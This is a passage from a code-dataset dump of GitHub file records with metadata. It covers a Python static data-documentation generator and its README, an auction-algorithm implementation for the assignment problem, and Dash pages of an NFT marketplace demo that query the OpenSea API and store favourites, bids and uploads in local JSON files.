datadocs['show_uncategorized']\n showPercentAnswered = datadocs['show_percent_answered']\n showPrivate = datadocs['show_private']\n\n # instantiate a list of datasets\n datasets = []\n for selectedDataset in datadocs['datasets']:\n # get the dataset name from the datadocs file\n datasetName = selectedDataset['name']\n\n # open the dataset yaml\n selectedDataset = yaml.load(open(\"docs/\" + datasetName + \".yaml\", \"r\"))\n\n datasetTitle = selectedDataset['title']\n datasetDescription = selectedDataset['description']\n\n # set the csv file name, which is just the\n # dataset name plus .csv\n datasetFileName = datasetName\n if \".csv\" not in datasetFileName:\n datasetFileName += \".csv\"\n\n # create a dataset object\n dataset = Dataset(datasetName, datasetTitle, datasetDescription)\n # read the data set as a csv and convert to a data frame\n df = pd.read_csv(\"docs/\" + datasetFileName, sep=',', header=0, encoding='ISO-8859-1', index_col=None)\n\n for selectedCategory in selectedDataset['categories']:\n categoryTitle = selectedCategory['title']\n categoryDescription = None\n if 'description' in selectedCategory:\n categoryDescription = selectedCategory['description']\n # create a category object\n category = Category(categoryTitle, categoryDescription)\n if 'fields' in selectedCategory:\n for selectedField in selectedCategory['fields']:\n fieldName = selectedField['name']\n fieldDescription = selectedField['description']\n fieldIsPrivate = False\n if 'private' in selectedField:\n fieldIsPrivate = selectedField['private']\n fieldIsTransformed = False\n if 'transformed' in selectedField:\n fieldIsTransformed = selectedField['transformed']\n\n # create a field object only if the field is not private or the\n # field is private and the settings indiate we want to display\n # private fields.\n if showPrivate == True or (showPrivate == False and fieldIsPrivate == False):\n field = Field(fieldName, description=fieldDescription, private=fieldIsPrivate, transformed=fieldIsTransformed)\n if \"type\" not in selectedField:\n # the user has not documented a datatype, so let's\n # guess what the data type is.\n field.dataType = field.getDataType(df)\n else:\n # Documentation includes a data type, so use that instead\n field.dataType = selectedField['type']\n\n # add this field to the category\n category.addField(field)\n\n # add this category to the dataset\n dataset.addCategory(category)\n\n # add this dataset to the list of datasets\n datasets.append(dataset)\n\n # determine if we want to add uncategorized field\n if showUncategorized:\n dataset.addUncategorizedFields(df)\n\n # generate search index\n search = generateSearch(datasets)\n\n \"\"\"\n Render templates\n \"\"\"\n # jinja2 templating settings\n env = Environment(loader=PackageLoader('makedocs', 'templates'))\n\n # make index page\n template = env.get_template('home.html')\n file = open('site/index.html', 'w')\n\n # documentation properties\n docTitle = None\n docDescription = None\n showPercentAnswered = None\n if datadocs['title']:\n docTitle = datadocs['title']\n if datadocs['show_percent_answered']:\n showPercentAnswered = datadocs['show_percent_answered']\n\n # check if there is an index.md file in /docs. If there is\n # open it up, convert the markdown contents and pass it along as\n # content\n try:\n content = markdown.markdown(open('docs/index.md', 'r').read())\n except:\n content = None\n file.write(template.render(datasets=datasets, static=\"static\", home=\"index.html\", docTitle=docTitle,\n search=search, content=content))\n\n for dataset in datasets:\n template = env.get_template('dataset.html')\n file = open('site/%s' % (dataset.getHtmlName()), 'w')\n\n # check if there is an [file_name].md file in /docs. If there is\n # open it up, convert the markdown contents and pass it along as\n # content\n try:\n content = markdown.markdown(open('docs/' + dataset.name + '.md', 'r').read())\n except:\n content = None\n\n file.write(template.render(dataset=dataset, datasets=datasets, static=\"static\", home=\"index.html\",\n docTitle=docTitle, showPercentAnswered=showPercentAnswered,\n showUncategorized=showUncategorized, search=search, content=content))\n\n # copy static folder (css and images)\n shutil.copytree(\"static\", \"site/static\")\n"
},
{
"alpha_fraction": 0.761551022529602,
"alphanum_fraction": 0.7637795209884644,
"avg_line_length": 47.08571243286133,
"blob_id": "b4609be852ecdee395a000aa3f849ea8acc24fef",
"content_id": "1a2582fdd1ddeb5b98fbf88ddc9b8f4a43b3a474",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6731,
"license_type": "no_license",
"max_line_length": 419,
"num_lines": 140,
"path": "/README.md",
"repo_name": "dhenderson/datadocs",
"src_encoding": "UTF-8",
"text": "# Datadocs\n\nDatadocs is static documentation for your datasets. I developed Datadocs to organize the vast number of datasets and fields we maintain at the [Family Independence Initiative][fii] (FII). Datadocs is fully searchable and great for internal use as well as sharing with external partners (we use it for both purposes at FII). \n\nSome key features of datadocs:\n\n- Fully searchable static documentation that can be hosted anywhere, including on Dropbox or S3.\n- Logically categorize fields, making it easier to quickly understand what fields a dataset contains.\n- Designate which fields are private or protected, especially useful when sharing with external partners.\n- Designate which fields are raw versus which have undergone some transformation. It is common to create new variables based on the raw data one has, keeping track of this makes for better, cleaner analysis.\n\nYou can view an example of datadocs with some dummy data on my personal site at [fullcontactphilanthropy/datadocs][example]. Datadocs is written for and tested in Python 3.4.\n\n# Getting started\n\nYour documentation goes in the `/docs` folder. You should delete the contents of the included example data and do the following:\n\n1. **Add your data as csv files** - Datadocs requires each dataset to be a comma delimited `csv` file. Drop each of your `csv` files in the `/docs` folder and remove the \"example.csv\" file.\n2. **Write yaml files for each csv** - Each `csv` file needs a `yaml` file of the same name. For example, if your dataset is `my_dataset.csv`, then Datadocs requires you to include a file named `my_dataset.yaml`. I recommend copying the `example.yaml` file and using that as a base template. How to write your `yaml` files is discussed in more detail in the following section on \"Documenting and registering your data\".\n3. **[Optional] Include markdown files** - If you want, you can include markdown files with additional detail about your datasets. Like the `yaml` files, include a similarly named `md` file to provide additional documentation for a dataset. For example, add a `my_dataset.md` to render markdown content before the data documentation for your `my_dataset.csv` file.\n4. **[Optional] Include an index.md file** - If you want to provide additional documentation on the index page of your documentation, you can include an `index.md` file. The `index.md` file is useful for giving a high level view of your data before a reader dives into the datasets.\n5. **Register your datasets** - Before making your documentation, you need to register each dataset in the `datadocs.yaml` file. For example, to add the `my_dataset.csv` and its `yaml` and `md` files, simply add `my_dataset` to the list of datasets in the `datadocs.yaml` file.\n6. **Make your documentation** - From the root directory execute `makedocs.py` with Python 3. Your static documentation will be built in the `/site` folder.\n\n# Documenting and registering your data\n\nThis section provides more detail on how to document and register your data in datadocs.\n\n## Documenting your data\n\nEach dataset `yaml` files has the following structure:\n\n```yaml\ntitle: \"Some title\"\ndescription: \"Some description\"\ncategories:\n - title: \"Some category title\"\n description: \"Some category description\"\n fields:\n - name: \"Some field name as found in the .csv file\"\n description: \"Some description for this field\"\n```\n\nEach field can also have have optional attributes as defined below.\n\n### Type\n\nThe `type` attribute indicates a field's datatype. This field is optional as Datadocs attempts to guess a field's datatype based on the data provided in your `csv` file. If you want to make sure the documentation produces the correct datatype, or you want to override Datadocs's guess, you can do so with `type`.\n\nUsage:\n\n```yaml\nfields:\n - name: \"Some field name as found in the .csv file\"\n description: \"Some description for this field\"\n type: \"Date\"\n```\n\nWhile you can provide any string for `type`, Datadocs expects one of the following:\n\n- Boolean\n- Categorical\n- Date\n- JSON\n- Numeric\n- Text\n- Yaml\n\n### Private\n\nThe `private` attribute indicates if a field is private or not. It is sometimes useful to document a field in a dataset and to share that you *have* a particular field, but that the field is somehow protected or private. A good example might be a Social Security number.\n\nUsage:\n\n```yaml\nfields:\n - name: \"Some field name as found in the .csv file\"\n description: \"Some description for this field\"\n private: false\n```\n\n### Transformed\n\nThe `transformed` attribute indicates if a field underwent some form of transformation. For example, if we have household size and the number of people in a household as raw data and we calculate the household's federal poverty line, the new variable would be considered transformed.\n\nUsage:\n\n```yaml\nfields:\n - name: \"Some field name as found in the .csv file\"\n description: \"Some description for this field\"\n transformed: false\n```\n\n## Registering your data\n\nYour datasets are registered in `/docs/datadocs.yaml`. If you had the following tow datasets:\n\n- my_dataset.csv\n- some_other_dataset.csv\n\nYour `datadocs.yaml` file might look like:\n\n```yaml\ntitle: \"My data documentation\"\nshow_uncategorized: false\nshow_percent_answered: false\nshow_private: true\ndatasets:\n - name: \"my_dataset\"\n - name: \"some_other_dataset\"\n```\n\nNote the file above also includes some metadata and settings, defined below:\n\n**title** - Title for your documentation.\n**show_uncategorized** - Whether to show fields you have not provided documentation for. Setting this attribute to `true` can be useful for determining which fields have not been documented yet.\n**show_percent_answered** - Whether to show the percent of fields that are not null. For example, if you have ten observations for a field with three nulls, setting `show_percent_answered` to `true` would indicate that 70% of observations are not null in your documentation for that field.\n**show_private** - Whether to include fields set to private when building the documentation. Toggling this attribute can be useful if you are sharing external documentation and you want to have certain fields documented, but you don't want others to know the field exists at all.\n\n# Building your documentation\n\nBuild your documentation by navigating to the root `datadocs` folder and typing the following at your command line:\n\n```bash\n$ python3 makedocs.py\n```\n\n# Dependencies\n\nA complete list of dependencies and version numbers are listed in the `requirements.txt` file in the root directory. Key dependencies are:\n\n- python 3\n- pandas\n- Markdown\n- Jinja2\n- PyYaml\n\n[fii]: http://fii.org\n[example]: http://fullcontactphilanthropy.com/datadocs/"
},
{
"alpha_fraction": 0.7608453631401062,
"alphanum_fraction": 0.764182448387146,
"avg_line_length": 179,
"blob_id": "2ff9243919b94deb54276ae54567c3f595607f31",
"content_id": "c93024486d23d197745fea1d46968bdc9a4dc2d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 899,
"license_type": "no_license",
"max_line_length": 307,
"num_lines": 5,
"path": "/docs/example.md",
"repo_name": "dhenderson/datadocs",
"src_encoding": "UTF-8",
"text": "This page provides documentation for some nonsense data. A few things to note in the `docs/example.yaml` file which defines the dataset features on this page:\n\n1. **Datatype guesses** - Datadocs attempts to guess the datatype of each filed by reading the provided `.csv` file. If you want to ensure the proper datatypes is included, you can use the 'type' key when defining a field.\n2. **Private fields** - The field `sex` is set to `private`. A private field is noted with a lock icon, and signals to the reader that while the field exists, it may not be available to be shared with others.\n3. **Transformed fields** - The `is_male_likes_cake` is set to `transformed`. Transformation means the datapoint has some how been constructed. For example, in this case `is_male_likes_cake` is determined based on answers to the `Sex` and `Likes cake` fields. Transformed fields are noted by an \"edit\" icon."
},
{
"alpha_fraction": 0.7847533822059631,
"alphanum_fraction": 0.7847533822059631,
"avg_line_length": 40.875,
"blob_id": "5e8aa77c79aeb54fd8a82c6b9dbc6419b9e2bf5e",
"content_id": "e2f690fe37d44599291566a2ce527555132068f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 320,
"num_lines": 16,
"path": "/docs/index.md",
"repo_name": "dhenderson/datadocs",
"src_encoding": "UTF-8",
"text": "# Introduction\n\nThis is a sample implementation of [Datadocs][datadocs]. Datadocs is a way to document your datasets, often called things like:\n\n- Data documentation\n- Data dictionary\n- Code book\n- etc.\n\nWhatever you call it, Datadocs is a way of documenting it.\n\n# Getting started with Datadocs\n\nSee the `README.md` file for detailed documentation for getting started. You should however clear out the contents of `/docs`, including this file, and put in your own documentation files. You should however get started by deleting the contents of this `index.md` file and writing your own documentation index page here.\n\n[datadocs]: https://github.com/dhenderson/datadocs"
}
] | 4 |
ohs2033/auction_algorithm
|
https://github.com/ohs2033/auction_algorithm
|
f3853ac79d1c1844691b803393902a36db51fdff
|
983a9bfe0e9747e9ca7aa25b5e7baccc9a361970
|
1e67b2259086fa4738605e29f2c982ab2bf87b30
|
refs/heads/master
| 2020-12-25T18:53:15.140287 | 2017-06-11T15:08:04 | 2017-06-11T15:08:04 | 94,012,041 | 0 | 0 | null | 2017-06-11T15:02:31 | 2016-02-08T21:54:53 | 2016-02-09T00:39:43 | null |
[
{
"alpha_fraction": 0.5446927547454834,
"alphanum_fraction": 0.5623835921287537,
"avg_line_length": 29.906475067138672,
"blob_id": "99f34a979935af8533697a8e01a785f3cba10d40",
"content_id": "70fdf980b9ec5ec4e4e272a3ab0d4456a8590968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4574,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 139,
"path": "/auction_alg.py",
"repo_name": "ohs2033/auction_algorithm",
"src_encoding": "UTF-8",
"text": "#-*- encoding: utf-8 -*-\nimport random\nimport timeit\nimport subprocess\nfrom collections import deque\n\nclass Auction(object): \n\n \"\"\"\n 변수 설명:\n matrix: bidder - goods 사이의 weight(value)를 나타내는 2차원 list\n assignments: 현재 상품(key)의 입찰자가 누구인지(value) 할당 관계를 나타내는 dictonary.\n q: 현재 goods에 할당되지 않은 bidder들을 담고 있는 queue(선입선출의 자료구조, python standard library로 구현)\n n: goods, 또는 bidder의 수(goods와 bidder의 수는 반드시 같아야 함.)\n price_arr: 입찰이 이루어질때마다 update되는 상품의 가격. (초기에 모두 0으로 시작함.)\n epsilon: 알고리즘의 종료를 보장하기 위한 실수값으로서 1/(n+1)로 계산된다.\n \"\"\"\n\n def __init__(self):\n self._assignments = {}\n self._matrix = [[0]]\n self._q = deque()\n self._n = 1\n self._price_arr = [0] * self._n\n self._epsilon = 0\n\n @property\n def matrix(self):\n return self._matrix\n \n @property\n def assignments(self):\n # format below\n for key, value in self._assignments.iteritems():\n print '(A{1}), (O{0})'.format(value + 1, key + 1)\n \n @matrix.setter\n def matrix(self, matrix):\n n = len(matrix)\n\n # check to make sure there is the same number of agents and objects\n if n is 0: raise Exception(\"matrix must be larger than 0\")\n for i in matrix:\n if len(i) is not n: raise Exception(\"matrix must have same number of rows and columns\")\n\n # 변수들을 초기화한다.\n self._matrix = matrix\n self._n = len(matrix)\n self._q = deque(range(0, self._n))\n self._price_arr = [0] * self._n\n self._epsilon = 1.0 / (1 + self._n)\n _assignments = {}\n\n\n def solve_auction(self):\n \"\"\"Return the string representing the solution to the assignment problem.\"\"\"\n start_time = timeit.default_timer()\n while len(self._q) > 0:\n # remove unassigned agent from the stack\n agent = self._q.popleft()\n\n # calculate current utility of agent -- this is not calculating correctly\n utility_arr = self._compute_utility_arr(agent)\n\n # pull out two largest values\n (x, px, py) = self._two_largest(utility_arr)\n\n # need an if or else it'll keep going\n self._if_assigned_replace(x, agent)\n\n # modify the price\n self._make_bid(x, px, py)\n\n elapsed = timeit.default_timer() - start_time\n print elapsed\n\n def _if_assigned_replace(self, x, agent):\n if x in self._assignments:\n if self._assignments[x] is not agent:\n self._q.append(self._assignments[x])\n self._assignments[x] = agent\n\n def _compute_utility_arr(self, agent):\n return [u - p for u, p in zip(self._matrix[agent], self._price_arr)]\n\n def _two_largest(self, utility_arr):\n \"\"\"Returns a list of the largest index and second_largest index\"\"\"\n largest, second_largest = None, None\n for x in utility_arr:\n if x >= largest:\n largest, second_largest = x, largest\n elif x > second_largest:\n second_largest = x\n return utility_arr.index(largest), largest, second_largest\n\n def _make_bid(self, x, px, py):\n #\n bid_increment = self._epsilon\n self._price_arr[x] = self._price_arr[x] + bid_increment\n\n def _compute_total_value(self):\n \"\"\"Return the optimal LP solution's final total\"\"\"\n total = 0\n for obj, agent in self._assignments.iteritems():\n total += self._matrix[agent][obj]\n\n print 'optimal solution: {}'.format(total)\n return total\n\n def gen_random(self, n, M):\n \"\"\"Set the random sqaure matrix of size n\"\"\"\n m = []\n for i in range(0, n):\n m.append([])\n for j in range(0, n):\n m[i].append(random.randint(0, M-1))\n\n self.matrix = m\n\n def compute_per_agent_average(self):\n total = self._compute_total_value()\n avg = float(total) / self._n\n return avg\n\nac = Auction()\n\nmat = [\n [30 , 37 , 40 , 28 , 40],\n [40 , 24 , 27 , 21 , 36],\n [40 , 32 , 33 , 30 , 35],\n [25 , 38 , 40 , 36 , 36],\n [29 , 62 , 41 , 34 , 39]\n]\n\nprint setattr(ac, 'matrix', mat)\nac.solve_auction()\nprint ac.assignments\navg = ac.compute_per_agent_average()\nprint 'average value is:',avg\n"
},
{
"alpha_fraction": 0.7297297120094299,
"alphanum_fraction": 0.7374517321586609,
"avg_line_length": 42.16666793823242,
"blob_id": "5849ffc93dce1a7de0258a9179a3b4664c77c94e",
"content_id": "133240e6e322e499efcf9281241b3fd1d9e56b46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 866,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 12,
"path": "/README.md",
"repo_name": "ohs2033/auction_algorithm",
"src_encoding": "UTF-8",
"text": "# Auction algorithm \n\nAssignment problem 을 풀기 위한 Auction algorithm의 구현입니다.\n<br>Auction algorithm은 헝가리안 알고리즘에 비해 알려져있지 않지만 상당히 간단한 알고리즘입니다.\n\n### 변수 해설\n- bidder - goods 사이의 weight(value)를 나타내는 2차원 list\n- assignments: 현재 상품(key)의 입찰자가 누구인지(value) 할당 관계를 나타내는 dictonary.\n- q: 현재 goods에 할당되지 않은 bidder들을 담고 있는 queue(선입선출의 자료구조, python standard library로 구현)\n- n: goods, 또는 bidder의 수(goods와 bidder의 수는 반드시 같아야 함.)\n- price_arr: 입찰이 이루어질때마다 update되는 상품의 가격. (초기에 모두 0으로 시작함.)\n- epsilon: 알고리즘의 종료를 보장하기 위한 실수값으로서 1/(n+1)로 계산된다.\n"
}
] | 2 |
KineBergseth/stacc-Kodekonkurranse-2021
|
https://github.com/KineBergseth/stacc-Kodekonkurranse-2021
|
6673ea7c91761994e52b558bd674e022246ee3d3
|
a4328aa18a8562233283eac78c3b17aa6ed5594a
|
9dd8035a77f7667d135e4fb3880aaebc67d345c8
|
refs/heads/master
| 2023-09-03T12:22:43.951286 | 2021-10-17T21:46:29 | 2021-10-17T21:46:29 | 415,425,371 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6000763177871704,
"alphanum_fraction": 0.6029383540153503,
"avg_line_length": 30.572288513183594,
"blob_id": "1a7c1a6e6710509b49d050cc7ce3643ed94018f3",
"content_id": "d509fd2b7cf6fd1ae4337f894569c09b0d0dc9b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5241,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 166,
"path": "/apps/profile.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport json\nfrom dash import html, dcc, Input, Output\nfrom dash.dash_table.Format import Format, Symbol\nfrom dash import dash_table\nimport random\nfrom app import app\n\n\ndef create_layout():\n \"\"\"\n Create html display with all components\n :return: html with components\n \"\"\"\n return html.Div(\n children=[\n html.H1('lizardlover23 profile', className=\"mt-3\"),\n html.P('Welcome back @lizardlover23', className=\"text-muted\"),\n html.P(['Here you can find an overview of your activity, such as your favorites assets, the bids you have '\n 'placed, and the NFTs you have upload and put for sale.', html.Br(),\n 'The display table has a built-in '\n 'sorting system']),\n dcc.Tabs(id=\"profile-tabs\", children=[\n dcc.Tab(label='Favorites', value='fav-tab'),\n dcc.Tab(label='Your active bids', value='bid-tab'),\n dcc.Tab(label='Your uploaded NFTs', value='upload-tab'),\n ],\n className=\"nav nav-tabs\",\n ),\n html.Div(id='profile-content-tabs')\n ])\n\n\ndef add_imgmarkdown(url):\n \"\"\"\n Add html to link to display image\n :param url: NFT image link\n :return: link in html element\n \"\"\"\n return \"<img src='{url}' height='75' />\".format(url=url)\n\n\ndef generate_table(data):\n \"\"\"\n Generate datatable with data about NFTs added to collection\n :param data: dataframe with NFT data\n :return: HTML to render table\n \"\"\"\n return dash_table.DataTable(\n id='table',\n data=data.to_dict('records'),\n columns=[\n {\"id\": \"image_url\", \"name\": \"NFT\", \"presentation\": \"markdown\"},\n {\"id\": \"name\", \"name\": \"name\"},\n {\"id\": \"price\", \"name\": \"Current bid\", 'format': Format().symbol(Symbol.yes).symbol_suffix('*'),\n },\n ],\n markdown_options={\"html\": True},\n sort_action='native',\n style_header={},\n style_cell={'textAlign': 'left', \"whiteSpace\": \"pre-line\"},\n style_as_list_view=True,\n editable=False,\n row_deletable=True,\n )\n\n\ndef get_asset(asset_contract_address, token_id):\n \"\"\"\n Get a perticular NFT\n :param asset_contract_address:\n :param token_id:\n :return: json data about NFT\n \"\"\"\n url = \"https://api.opensea.io/api/v1/asset/{asset_contract_address}/{token_id}/\".format(\n asset_contract_address=asset_contract_address, token_id=token_id)\n response = requests.request(\"GET\", url)\n return response.json()\n\n\ndef get_NFTs(df):\n \"\"\"\n For all NFTs in a dataframe, get more data from api\n :param df: dataframe with local stored data\n :return: dataframe with asset data\n \"\"\"\n bids = []\n for item in df.index:\n bids.append(get_asset(df['asset_contract_address'][item], df['token_id'][item]))\n df = pd.json_normalize(bids)\n col_list = ['id', 'token_id', 'asset_contract.address', 'image_url', 'name']\n df = pd.DataFrame(df, columns=col_list)\n df['image_url'] = df['image_url'].apply(add_imgmarkdown)\n df = df.rename(columns={'asset_contract.address': 'asset_contract_address'})\n return df\n\n\ndef random_bid_gen():\n \"\"\"\n Generate random number to add as fake bid on the users uploaded NFTS\n :return: int between 0-40\n \"\"\"\n random_bid = random.randint(0, 40)\n return random_bid\n\n\ndef tab_favs():\n \"\"\"\n Get favourite data from json and convert to df and create table\n :return: dataframe with NFT data\n \"\"\"\n f = open('favourites.json', )\n fav_data = json.load(f)\n df_fav = pd.DataFrame(fav_data['favourites'])\n df = get_NFTs(df_fav)\n return generate_table(df)\n\n\ndef tab_bids():\n \"\"\"\n Get bid data from json and convert to df and create table\n :return: dataframe with NFT data\n \"\"\"\n f = open('bids.json', )\n bid_data = json.load(f)\n df_bid = pd.DataFrame(bid_data['bids'])\n df = get_NFTs(df_bid)\n result = pd.merge(df, df_bid)\n return generate_table(result)\n\n\ndef tab_uploads():\n \"\"\"\n Get data about uploaded NFTs from json and convert to df and create table\n :return: dataframe with NFT data\n \"\"\"\n f = open('uploads.json', )\n uploaded_data = json.load(f)\n df_uploads = pd.DataFrame(uploaded_data['uploaded_nfts'])\n col_list = ['id', 'token_id', 'asset_contract.address', 'image_url', 'name']\n df = pd.DataFrame(df_uploads, columns=col_list)\n df['image_url'] = df['image_url'].apply(add_imgmarkdown)\n\n # generate some random fictive bids for the users uploaded NFTs\n fictive_bids = []\n for row in df.index:\n fictive_bids.append(random_bid_gen())\n df['price'] = fictive_bids\n return generate_table(df)\n\n\[email protected](Output('profile-content-tabs', 'children'),\n Input('profile-tabs', 'value'))\ndef render_tabcontent(tab):\n \"\"\"\n Render tab content based on user click input\n :param tab: tab id\n :return: call function to get correct data and generate datatable\n \"\"\"\n if tab == 'fav-tab':\n return tab_favs()\n elif tab == 'bid-tab':\n return tab_bids()\n elif tab == 'upload-tab':\n return tab_uploads()\n"
},
{
"alpha_fraction": 0.556317925453186,
"alphanum_fraction": 0.5608919262886047,
"avg_line_length": 31.09174346923828,
"blob_id": "4f6df416f37a21c1b5739abd88c2d4fbed237ca8",
"content_id": "bf1ec94c78df4e10a3f0f30609650cad40a90f5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3498,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 109,
"path": "/apps/events.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash_bootstrap_components as dbc\nimport requests\nimport dash\nimport pandas as pd\nfrom dash.exceptions import PreventUpdate\nfrom dash import html, dash_table, Input, Output\nfrom app import app\n\n\ndef convert_price(wei):\n \"\"\"\n convert wei to ETH\n :param url: wei amount\n :return: ETH amount\n \"\"\"\n return wei / pow(10, 18)\n\n\ndef add_imgmarkdown(url):\n \"\"\"\n Add html to link to display image\n :param url: NFT image link\n :return: link in html element\n \"\"\"\n return \"<img src='{url}' height='75' />\".format(url=url)\n\n\ndef get_events(event_type):\n url = f\"https://api.opensea.io/api/v1/events?event_type={event_type}&only_opensea=false&offset=0&limit=30\"\n headers = {\"Accept\": \"application/json\"}\n response = requests.request(\"GET\", url, headers=headers)\n data = response.json()\n\n df = pd.json_normalize(data['asset_events'])\n df = pd.DataFrame(df)\n col_list = ['asset.image_url', 'asset.name', 'event_type', 'ending_price']\n df = pd.DataFrame(df, columns=col_list)\n df['asset.image_url'] = df['asset.image_url'].apply(add_imgmarkdown)\n df['ending_price'] = df['ending_price'].astype(float)\n df['ending_price'] = df['ending_price'].apply(convert_price)\n pd.set_option('display.max_colwidth', None) # extend colwidth to display whole value, instead of partial values\n return df\n\n\ndef generate_table(data):\n return dash_table.DataTable(\n id='table',\n data=data.to_dict('records'),\n columns=[\n {\"id\": \"asset.image_url\", \"name\": \"NFT\", \"presentation\": \"markdown\"},\n {\"id\": \"asset.name\", \"name\": \"Item\"},\n {\"id\": \"ending_price\", \"name\": \"Price ETH\"},\n {\"id\": \"event_type\", \"name\": \"Event\"},\n ],\n markdown_options={\"html\": True},\n sort_action='native',\n style_header={},\n style_cell={'textAlign': 'left', \"whiteSpace\": \"pre-line\"},\n style_as_list_view=True,\n editable=False,\n )\n\n\ndef create_layout():\n \"\"\"\n Creates the layout for the home page\n :return: layout with all the elements in\n \"\"\"\n\n return html.Div(\n [\n html.Div(\n [\n html.H1('Activity', className='header-text text-center mt-3'),\n dbc.ButtonGroup(\n [\n dbc.Button(\"Listings\", id=\"created\", outline=True, color=\"primary\"),\n dbc.Button(\"Sales\", id=\"successful\", outline=True, color=\"primary\"),\n dbc.Button(\"Bids\", id=\"bid_entered\", outline=True, color=\"primary\"),\n dbc.Button(\"Transfers\", id=\"transfer\", outline=True, color=\"primary\"),\n ],\n className=\"mt-3 mb-3\",\n )\n ],\n className=\"header\",\n ),\n html.Div(id=\"event_list\"),\n ],\n className=\"main\"\n )\n\n\[email protected](\n Output(\"event_list\", \"children\"),\n [Input(\"created\", \"n_clicks\"),\n Input(\"successful\", \"n_clicks\"),\n Input(\"bid_entered\", \"n_clicks\"),\n Input(\"transfer\", \"n_clicks\")]\n)\ndef update_table(n_listings, n_sales, n_bids, n_transfers):\n ctx = dash.callback_context\n\n if not ctx.triggered:\n raise PreventUpdate\n else:\n button_id = ctx.triggered[0]['prop_id'].split('.')[0] # get btn id for event type\n print(button_id)\n data = get_events(button_id)\n return generate_table(data)\n"
},
{
"alpha_fraction": 0.5217754244804382,
"alphanum_fraction": 0.533288836479187,
"avg_line_length": 35.32121276855469,
"blob_id": "217c887698c4c4fe4fc9e0a83bddc7fc73dac534",
"content_id": "412a52b35bfbef9e444fcd88932ad489d78d9b2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5993,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 165,
"path": "/apps/upload.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "from app import app\nimport datetime\nimport json\nimport string\nimport secrets\nfrom datetime import datetime\nimport dash_bootstrap_components as dbc\nfrom dash import html, dcc, Input, Output\n\n\ndef create_layout():\n \"\"\"\n Create layout, input form for image, name and description of a NFT\n :return: html to render content\n \"\"\"\n upload_nft_img = html.Div([\n dcc.Upload(\n id='upload-nft-img',\n children=html.Div([\n 'Drag & drop or ',\n html.A('Select file to upload')\n ]),\n style={\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n className=\".w-50 mb-3\",\n multiple=False\n )\n ])\n\n name_input = html.Div(\n [\n dbc.Label(\"Name\"),\n dbc.Input(type=\"text\", id=\"nft-name\", placeholder=\"Enter name\"),\n ],\n className=\"mb-3\",\n )\n\n desc_input = html.Div(\n [\n dbc.Label(\"Description\"),\n dbc.Input(\n type=\"text\",\n id=\"nft-desc\",\n placeholder=\"Enter description\",\n ),\n ],\n className=\"mb-3\",\n )\n\n input_form = dbc.Form([name_input, desc_input])\n\n return html.Div(\n children=[\n html.Div(\n html.H1('Upload NFT', className='header-text text-center mt-3'),\n className=\"header\",\n ),\n upload_nft_img,\n input_form,\n dbc.Button(\n \"Upload\", id=\"upload_nft\", className=\"ml-auto\", n_clicks=0,\n ),\n html.Div(id='nft-data-upload'),\n\n ],\n className=\"main\"\n )\n\n\ndef random_data_gen(length):\n \"\"\"\n Generate random metadata using secure random string. With cryptography no string generated will be the same result\n :param length: length of generated string\n :return: randomized string containing letters and numbers\n \"\"\"\n metadata = ''.join(secrets.choice(string.ascii_letters + string.digits) for x in range(length))\n return str(metadata)\n\n\[email protected](\n Output(\"nft-data-upload\", \"children\"),\n [Input(\"upload_nft\", \"n_clicks\"),\n Input(\"nft-name\", \"value\"),\n Input(\"nft-desc\", \"value\"),\n Input('upload-nft-img', 'contents')\n ]\n)\ndef add_nft(n_upload, name, description, image_url):\n \"\"\"\n Add NFT to local json file with all data\n :param n_upload: upload button click event\n :param name: name input from formgroup\n :param description: description of NFT\n :param image_url: base64 encoded image\n :return: html to render img and table with recap of inputted and generated data\n \"\"\"\n if n_upload:\n if image_url is None:\n return html.P(\"Please upload nft file\")\n else:\n nft_id = random_data_gen(8) # generate data\n token_id = random_data_gen(60)\n contract_address = f\"0x{random_data_gen(40)}\"\n date = datetime.now() # get current time and date\n upload_asset = {\n \"id\": nft_id,\n \"token_id\": token_id,\n \"image_url\": image_url,\n \"name\": name,\n \"description\": description,\n \"asset_contract\": {\n \"address\": contract_address,\n \"asset_contract_type\": \"semi-fungible\",\n \"created_date\": str(date),\n \"name\": \"Stacc Collection\",\n \"owner\": 1920133,\n \"schema_name\": \"ERC1155\",\n \"symbol\": \"STACC\"\n },\n \"owner\": {\n \"user\": {\n \"username\": \"lizardlover23\"\n }\n }\n }\n write_json(upload_asset, 'uploaded_nfts', 'uploads.json')\n\n # create table rows to display all NFT data in\n row1 = html.Tr([html.Td(\"id\"), html.Td(upload_asset['id'])])\n row2 = html.Tr([html.Td(\"token id\"), html.Td(upload_asset['token_id'])])\n row3 = html.Tr([html.Td(\"name\"), html.Td(upload_asset['name'])])\n row4 = html.Tr([html.Td(\"description\"), html.Td(upload_asset['description'])])\n row5 = html.Tr([html.Td(\"asset contract address\"), html.Td(upload_asset['asset_contract']['address'])])\n row6 = html.Tr([html.Td(\"asset contract type\"), html.Td(upload_asset['asset_contract']['asset_contract_type'])])\n row7 = html.Tr([html.Td(\"created_date\"), 